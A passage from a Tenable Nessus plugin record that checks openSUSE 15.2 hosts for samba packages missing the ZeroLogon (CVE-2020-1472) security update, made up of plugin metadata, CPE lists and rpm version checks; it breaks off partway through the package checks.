"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo", "p-cpe:/a:novell:opensuse:libsamba-util-devel", "p-cpe:/a:novell:opensuse:libsamba-util0", "p-cpe:/a:novell:opensuse:libsamba-util0-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit", "p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap-devel", "p-cpe:/a:novell:opensuse:libsmbldap2", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit", "p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util-devel", "p-cpe:/a:novell:opensuse:libtevent-util0", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit", "p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient-devel", "p-cpe:/a:novell:opensuse:libwbclient0", "p-cpe:/a:novell:opensuse:libwbclient0-32bit", "p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo", "p-cpe:/a:novell:opensuse:libwbclient0-debuginfo", "p-cpe:/a:novell:opensuse:samba", "p-cpe:/a:novell:opensuse:samba-ad-dc", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit", "p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo", "p-cpe:/a:novell:opensuse:samba-ceph", "p-cpe:/a:novell:opensuse:samba-ceph-debuginfo", "p-cpe:/a:novell:opensuse:samba-client", "p-cpe:/a:novell:opensuse:samba-client-32bit", "p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo", "p-cpe:/a:novell:opensuse:samba-client-debuginfo", "p-cpe:/a:novell:opensuse:samba-core-devel", "p-cpe:/a:novell:opensuse:samba-debuginfo", "p-cpe:/a:novell:opensuse:samba-debugsource", "p-cpe:/a:novell:opensuse:samba-dsdb-modules", "p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo", "p-cpe:/a:novell:opensuse:samba-libs"], "id": "OPENSUSE-2020-1526.NASL", "href": "https://www.tenable.com/plugins/nessus/141072", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2020-1526.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(141072);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/05/23\");\n\n script_cve_id(\"CVE-2020-1472\");\n script_xref(name:\"IAVA\", value:\"2020-A-0438-S\");\n script_xref(name:\"IAVA\", value:\"0001-A-0647\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2020/09/21\");\n script_xref(name:\"CISA-NCAS\", value:\"AA22-011A\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0129\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0101\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0025\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2021-0008\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2020-0121\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2023-0016\");\n\n script_name(english:\"openSUSE Security Update : samba (openSUSE-2020-1526)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"This update for samba fixes the following issues :\n\n - ZeroLogon: An elevation of privilege was possible with\n some non default configurations when an attacker\n established a vulnerable Netlogon secure channel\n connection to a domain controller, using the Netlogon\n Remote Protocol (MS-NRPC) (CVE-2020-1472, bsc#1176579).\n\n - Update to samba 4.11.13\n\n + s3: libsmb: Fix SMB2 client rename bug to a Windows\n server; (bso#14403);\n\n + dsdb: Allow 'password hash userPassword schemes =\n CryptSHA256' to work on RHEL7; (bso#14424);\n\n + dbcheck: Allow a dangling forward link outside our known\n NCs; (bso#14450);\n\n + lib/debug: Set the correct default backend loglevel to\n MAX_DEBUG_LEVEL; (bso#14426);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + lib/util: do not install 'test_util_paths'; (bso#14370);\n\n + lib:util: Fix smbclient -l basename dir; (bso#14345);\n\n + s3:smbd: PANIC: assert failed in get_lease_type();\n (bso#14428);\n\n + util: Allow symlinks in directory_create_or_exist;\n (bso#14166);\n\n + docs: Fix documentation for require_membership_of of\n pam_winbind; (bso#14358);\n\n + s3:winbind:idmap_ad: Make failure to get attrnames for\n schema mode fatal; (bso#14425);\n\nThis update was imported from the SUSE:SLE-15-SP2:Update update\nproject.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.opensuse.org/show_bug.cgi?id=1176579\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected samba packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2020-1472\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2020/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2020/09/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2020/09/30\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-pcp-pmda-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:ctdb-tests-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-binding0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc-samr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libdcerpc0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-krb5pac0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-nbt0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr-standard0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libndr0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libnetapi0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-credentials0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-errors0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-hostconfig0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-passdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy-python3-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-policy0-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamba-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsamdb0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbconf0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libsmbldap2-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libtevent-util0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libwbclient0-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ad-dc-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-ceph-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-client-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-core-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-dsdb-modules-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-libs-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-python3-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-test-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-32bit-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:samba-winbind-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:15.2\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2020-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE15\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"15.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-pcp-pmda-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"ctdb-tests-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-binding0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc-samr0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libdcerpc0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-krb5pac0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-nbt0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr-standard0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libndr0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libnetapi0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-credentials0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-errors0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-hostconfig0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-passdb0-debuginfo-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy-python3-devel-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", reference:\"libsamba-policy0-python3-4.11.13+git.189.e9bd318cd13-lp152.3.13.1\") ) flag++;\nif ( rpm_check(release:\"SUSE15.2\", 